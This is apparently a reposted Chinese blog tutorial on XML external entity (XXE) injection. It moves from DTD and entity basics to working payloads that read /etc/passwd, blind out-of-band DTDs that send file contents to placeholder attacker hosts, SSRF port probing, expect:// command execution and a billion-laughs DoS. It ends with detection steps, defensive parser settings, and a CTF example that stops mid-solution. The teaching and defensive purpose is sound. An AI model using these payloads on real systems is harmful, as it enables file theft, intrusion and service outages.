XML简介
介绍 XXE 之前,我先来说一下普通的 XML 注入,这个的利用面比较狭窄,如果有的话应该也是逻辑漏洞。如图所示:
既然能插入 XML 代码,那我们肯定不能善罢甘休,我们需要更多,于是出现了 XXE漏洞。XXE(XML External Entity Injection) 全称为 XML 外部实体注入,从名字就能看出来,这是一个注入漏洞,注入的是什么?XML外部实体。
1、定义
XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。
2、文档结构
XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。
<?xml version="1.0"?>
<!DOCTYPE note [
<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT head (#PCDATA)>
<!ELEMENT body (#PCDATA)>
]]]>
Dave
Tom
Reminder
You are a good man
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
3、DTD
DTD(document type definition 文档类型定义)的作用是定义XML文档的合法构建模块。DTD可以在XML文档内声明,也可以外部引用。
(1)内部声明DTD
<!DOCTYPE 根元素 [元素声明]>
1
(2)引用外部DTD
<!DOCTYPE 根元素 SYSTEM "文件名">
1
(3)内外部DTD文档结合:
<!DOCTYPE 根元素 SYSTEM "DTD文件路径" [定义内容]>
1
(4)DTD中的一些重要的关键字:
DOCTYPE(DTD的声明)
ENTITY(实体的声明)
SYSTEM、PUBLIC(外部资源申请)
1
2
3
4、实体类别介绍
实体主要分为一下四类:
内置实体 (Built-in entities)
字符实体 (Character entities)
通用实体 (General entities)
参数实体 (Parameter entities)
【区分】
(1)参数实体用%实体名称申明,引用时也用%实体名称;
(2)其余实体直接用实体名称申明,引用时用&实体名称。
(3)参数实体只能在DTD中申明,DTD中引用;
(4)其余实体只能在DTD中申明,可在xml文档中引用。
注意:参数实体是在DTD中被引用的,而其余实体是在xml文档中被引用的。
5、DTD实体声明
XML中对数据的引用称为实体。
(1)内部实体声明
<!ENTITY 实体名称 “实体的值”>
1
一个实体由三部分构成:&符号, 实体名称, 分号。
这里&不论在GET还是在POST中都需要进行URL编码,因为是使用参数传入xml的,&符号会被认为是参数间的连接符号,示例:
<!DOCTYPE foo [<!ELEMENT foo ANY >
<!ENTITY xxe "Thinking">]>
&xxe;
1
2
3
(2)外部实体声明
<!ENTITY 实体名称 SYSTEM “URI/URL”>
1
外部实体用来引入外部资源,有SYSTEM和PUBLIC两个关键字,表示实体来自本地计算机还是公共计算机,外部实体的引用可以借助各种协议,比如如下的三种:
file:///path/to/file.ext
http://url
php://filter/read=convert.base64-encode/resource=conf.php
1
2
3
示例:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xdsec [
<!ELEMENT methodname ANY >
<!ENTITY xxe(实体引用名) SYSTEM "file:///etc/passwd"(实体内容) >]>
&xxe;
1
2
3
4
5
6
7
这种写法则调用了本地计算机的文件/etc/passwd,XML内容被解析后,文件内容便通过&xxe被存放在了methodname元素中,造成了敏感信息的泄露。
(3)参数实体声明
<!ENTITY % 实体名称 “实体的值”>
or
<!ENTITY % 实体名称 SYSTEM “URI”>
1
2
3
示例:
<!DOCTYPE foo [<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "http://xxx.xxx.xxx/evil.dtd" >
%xxe;]>
&evil;
1
2
3
4
外部evil.dtd中的内容:
<!ENTITY evil SYSTEM “file:///c:/windows/win.ini” >
1
(4)引用公共实体
<!ENTITY 实体名称 PUBLIC "public_ID" "URI">
1
XXE漏洞简介
有了XML实体,关键字SYSTEM会令XML解析器从URI中读取内容,并允许它在XML文档中被替换。因此,攻击者可以通过实体将他自定义的值发送给应用程序,然后让应用程序去呈现。
简单来说,攻击者强制XML解析器去访问攻击者指定的资源内容(可能是系统上本地文件亦或是远程系统上的文件)。比如,下面的代码将获取系统上folder/file的内容并呈献给用户。
Code1:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE a [<!ENTITY passwd SYSTEM "file:///etc/passwd">]>
&passwd;
1
2
3
4
5
Code2:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE b [<!ENTITY entityex SYSTEM "file:///folder/file">]>
&entityex;
1
2
3
4
5
Code3:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=index.php" >
]>
&xxe;
1
2
3
4
5
6
7
8
以Code1代码为例,XML外部实体 passwd 被赋予的值为:file:///etc/passwd。在解析XML文档的过程中,实体 passwd 的值会被替换为URI(file:///etc/passwd)内容值(也就是 passwd 文件的内容)。关键字SYSTEM会告诉XML解析器,passwd 实体的值将从其后的URI中读取。
XXE漏洞危害
XXE漏洞的危害有很多,比如可以文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等。通常攻击者会将payload注入XML文件中,一旦文件被执行,将会读取服务器上的本地文件,并对内网发起访问扫描内部网络端口。换而言之,XXE是一种从本地到达各种服务的方法。此外,在一定程度上这也可能帮助攻击者绕过防火墙规则过滤或身份验证检查。
任意文件读取
1、有回显的情况
以下是一个简单的XML代码POST请求示例:
POST /vulnerable HTTP/1.1
Host: www.test.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: https://test.com/test.html
Content-Type: application/xml
Content-Length: 294
Cookie: mycookie=cookies;
Connection: close
Upgrade-Insecure-Requests: 1
<?xml version="1.0"?>
John, Doe
Computers
9.99
2018-10-01
XML is the best!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
之后,上述代码将交由服务器的XML处理器解析。代码被解释并返回:
{“Request Successful”: “Added!”}
1
现在,当攻击者试图滥用XML代码解析时会发生什么?让我们编辑代码并包含我们的恶意payload:
<?xml version="1.0"?>
<!DOCTYPE GVI [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
John, Doe
Computers
9.99
2018-10-01
&xxe;
1
2
3
4
5
6
7
8
9
10
11
12
代码被解释并返回:
{"error": "no results for description root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync...
1
2
3
4
5
2、无回显的情况
前面任意文件读取能够成功,除了DTD可有引用外部实体外,还取决于有输出信息,即有回显。那么如果程序没有回显的情况下,该怎么读取文件内容呢?需要使用blind xxe漏洞去利用。
外部文档类型定义(DTD)文件可被用于触发OOB XXE。攻击者将.dtd文件托管在VPS上,使远程易受攻击的服务器获取该文件并执行其中的恶意命令。
以下请求将被发送到应用程序以演示和测试该方法:
<?xml version="1.0"?>
<!DOCTYPE data SYSTEM "http://ATTACKERSERVER.com/xxe_file.dtd">
John, Doe
Computers
9.99
2018-10-01
&xxe;
1
2
3
4
5
6
7
8
9
10
11
12
上述代码一旦由易受攻击的服务器处理,就会向我们的远程服务器发送请求,查找包含我们的payload的DTD文件:
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % all "<!ENTITY xxe SYSTEM 'http://ATTACKESERVER.com/?%file;'>">
%all;
1
2
3
让我们花点时间了解上述请求的执行流程。结果是有两个请求被发送到了我们的服务器,第二个请求为/etc/passwd文件的内容。
在我们的VPS日志中我们可以看到,带有文件内容的第二个请求,以此我们也确认了OOB XXE漏洞的存在:
http://ATTACKERSERVER.com/?daemon%3Ax%3A1%3A1%3Adaemon%3A%2Fusr%2Fsbin%3A%2Fbin%2Fsh%0Abin%3Ax%3A2%3A2%3Abin%3A%2Fbin%3A%2Fbin%2Fsh
1
blind xxe漏洞方案1:
对于传统的XXE来说,要求攻击者只有在服务器有回显或者报错的基础上才能使用XXE漏洞来读取服务器端文件,如果没有回显则可以使用Blind XXE漏洞来构建一条带外信道提取数据。
创建test.php写入以下内容:
<?php
file_put_contents("test.txt", $_GET['file']) ;
?>
1
2
3
创建index.php写入以下内容:
<?php
$xml=<<
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///C:/test.txt">
<!ENTITY % remote SYSTEM "http://localhost/test.xml">
%remote;
%all;
%send;
]>
EOF;
$data = simplexml_load_string($xml) ;
echo "
" ;
print_r($data) ;
?>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
创建test.xml并写入以下内容:
<!ENTITY % all "<!ENTITY % send SYSTEM 'http://localhost/test.php?file=%file;'>">
1
当访问http://localhost/index.php, 存在漏洞的服务器会读出text.txt内容,发送给攻击者服务器上的test.php,然后把读取的数据保存到本地的test.txt中。
blind xxe漏洞方案2:
可以将文件内容发送到远程服务器,然后读取。
<?xml verstion="1.0" encoding="utf-8"?>
<!DOCTYPE a[
<!ENTITY % f SYSTEM "http://yourhost/evil.dtd">
%f;
]>
&b;
$data = simplexml_load_string($xml);
print_r($data);
1
2
3
4
5
6
7
8
远程服务器的evil.dtd文件内容:
<!ENTITY b SYSTEM "file:///etc/passwd">
1
blind xxe漏洞方案3:
可以使用外带数据通道提取数据,先使用php://filter获取目标文件的内容,然后将内容以http请求发送到接受数据的服务器(攻击服务器)xxx.xxx.xxx。
<?xml version=”1.0”?>
<!DOCTYPE ANY [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=./target.php"> # /etc/issue
<!ENTITY % dtd SYSTEM "http://xxx.xxx.xxx/evil.dtd">
%dtd;
%send;
]>
1
2
3
4
5
6
7
evil.dtd的内容,内部的%号要进行实体编码成%。
<!ENTITY % all
“<!ENTITY % send SYSTEM ‘http://xxx.xxx.xxx/?%file;’>”
>
%all;
1
2
3
4
有报错直接查看报错信息。
无报错需要访问接受数据的服务器中的日志信息,可以看到经过base64编码过的数据,解码后便可以得到数据。
开放端口扫描
在第一个示例中,我们通过URI将请求指向了/etc/passwd文件,并最终成功的为我们返回了文件中的内容。除此之外,我们也可以使用http URI并强制服务器向我们指定的端点和端口发送GET请求,将XXE转换为SSRF(服务器端请求伪造)。
以下代码将尝试与端口8080通信,根据响应时间/长度,攻击者将可以判断该端口是否已被开启。
<?xml version="1.0"?>
<!DOCTYPE GVI [<!ENTITY xxe SYSTEM "http://127.0.0.1:8080" >]>
John, Doe
Computers
9.99
2018-10-01
&xxe;
1
2
3
4
5
6
7
8
9
10
11
12
远程代码执行
这种情况很少发生,但有些情况下攻击者能够通过XXE执行代码,这主要是由于配置不当/开发内部应用导致的。如果我们足够幸运,并且PHP expect模块被加载到了易受攻击的系统或处理XML的内部应用程序上,那么我们就可以执行如下的命令:
<?xml version="1.0"?>
<!DOCTYPE GVI [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>
John, Doe
Computers
9.99
2018-10-01
&xxe;
1
2
3
4
5
6
7
8
9
10
11
12
13
响应:
{"error": "no results for description uid=0(root) gid=0(root) groups=0(root)...
1
拒绝服务攻击
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
&lol9;
1
2
3
4
5
6
7
8
9
10
11
12
13
上面样例代码2中的XXE漏洞攻击就是著名的 billion laughs 攻击。(https://en.wikipedia.org/wiki/Billion_laughs),该攻击通过创建一项递归的 XML 定义,在内存中生成十亿个”Ha!”字符串,从而导致 DDoS 攻击。
原理为——构造恶意的XML实体文件耗尽可用内存,因为许多XML解析器在解析XML文档时倾向于将它的整个结构保留在内存中,解析非常慢,造成了拒绝服务器攻击。除了这些,攻击者还可以读取服务器上的敏感数据,还能通过端口扫描,获取后端系统的开放端口。
XXE漏洞检测
简单来说,XXE就是XML外部实体注入。当允许引用外部实体时,通过构造恶意内容,就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害。
XXE漏洞主要针对web服务危险的引用的外部实体并且未对外部实体进行敏感字符的过滤。例如,如果你当前使用的程序为PHP,则可以将libxml_disable_entity_loader设置为TRUE来禁用外部实体,从而起到防御的目的。
如何检测和甄别XXE漏洞?
最直接的回答就是: 甄别那些接受XML作为输入内容的端点。 但是有时候,这些端点可能并不是那么明显(比如,一些仅使用JSON去访问服务的客户端)。在这种情况下,渗透测试人员就必须尝试不同的测试方式,比如修改HTTP的请求方法(将Get请求改为Post请求),修改Content-Type头部字段(将application/json改为application/xml)等等方法,然后提交测试POC,看看应用程序的响应,看看程序是否解析了发送的内容,如果解析了,那么则可能有XXE攻击漏洞。例如wsdl(web服务描述语言)。或者一些常见的采用xml的java服务配置文件(spring,struts2)。
不过现实中存在的大多数XXE漏洞都是blind,即不可见的,必须采用带外通道进行返回信息的记录,这里简单来说就是攻击者必须具有一台具有公网IP的主机。
XXE漏洞检测的基本流程:
如果发现数据直接传送方式为XML,那么直接注入Payload进行测试;
如果HTTP请求头里Content-Type为application/json并使用Json进行数据交互的Web站点,可以修改其Content-Type为application/xml,并尝试进行XXE注入。
XXE漏洞具体检测步骤:
【1】第一步检测XML是否会被成功解析:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE ANY [
<!ENTITY name "my name is nMask">]>
&name;
1
2
3
4
如果页面输出了my name is nMask,说明xml文件可以被解析。
【2】第二步检测服务器是否支持DTD引用外部实体:
<?xml version=”1.0” encoding=”UTF-8”?>
<!DOCTYPE ANY [
<!ENTITY % name SYSTEM "http://localhost/index.html">
%name;
]>
1
2
3
4
5
可通过查看自己服务器上的日志来判断,看目标服务器是否向你的服务器发了一条请求index.html的请求。
XXE漏洞的检测实例:
首先观察这个HTTP数据包,在发送方的HTTP包头中可以通过conetent-type观察到服务端以xml的形式接收文件,符合XXE漏洞的基本条件,然后服务器会正常返回客户端在body中post过去的XML代码执行结果。
此时就可以构造恶意的XML代码,可以看见服务器仍是正常返回,说明在服务器端并没有进行过滤,因此可以初步确定此应用存在XXE漏洞(非Blind的XXE),接下来可继续测试是否可以加载外部实体。
【自动化检测】网上已经有可以自动检测XXE漏洞的开源工具XXEInjector:https://github.com/enjoiz/XXEinjector.git。
XXE漏洞防御
XXE漏洞存在是因为XML解析器解析了用户发送的不可信数据。然而,要去校验DTD(document type definition)中SYSTEM标识符定义的数据,并不容易,也不大可能。大部分的XML解析器默认对于XXE攻击是脆弱的。因此,最好的解决办法就是配置XML处理器去使用本地静态的DTD,不允许XML中含有任何自己声明的DTD。通过设置相应的属性值为false,XML外部实体攻击就能够被阻止。因此,可将外部实体、参数实体和内联DTD 都被设置为false,从而避免基于XXE漏洞的攻击。
方案一:使用开发语言提供的禁用外部实体的方法
PHP
libxml_disable_entity_loader(true);
JAVA
DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);
Python
from lxml import etree
xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))
1
2
3
4
5
6
7
8
9
10
方案二:过滤用户提交的XML数据
过滤关键词:
<!DOCTYPE 和 <!ENTITY
SYSTEM 和 PUBLIC。
CTF实例题目
【题目链接】http://web.jarvisoj.com:9882/
目的很明确——获取/home/ctf/flag.txt的内容。
下面分析源码:
很明显是AJAX异步传送数据。
在一般的异步网站都会有异步数据与服务器的交互,一般传送数据为json但如果将传送的数据格式改为xml。有很大的可能服务器会解析你异步上传的xml脚本执行想要干的事。
【解题步骤】
要先修改Content-Type: application/xml,然后加入xml脚本即可:
————————————————
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
原文链接:https://blog.csdn.net/weixin_39190897/article/details/103237488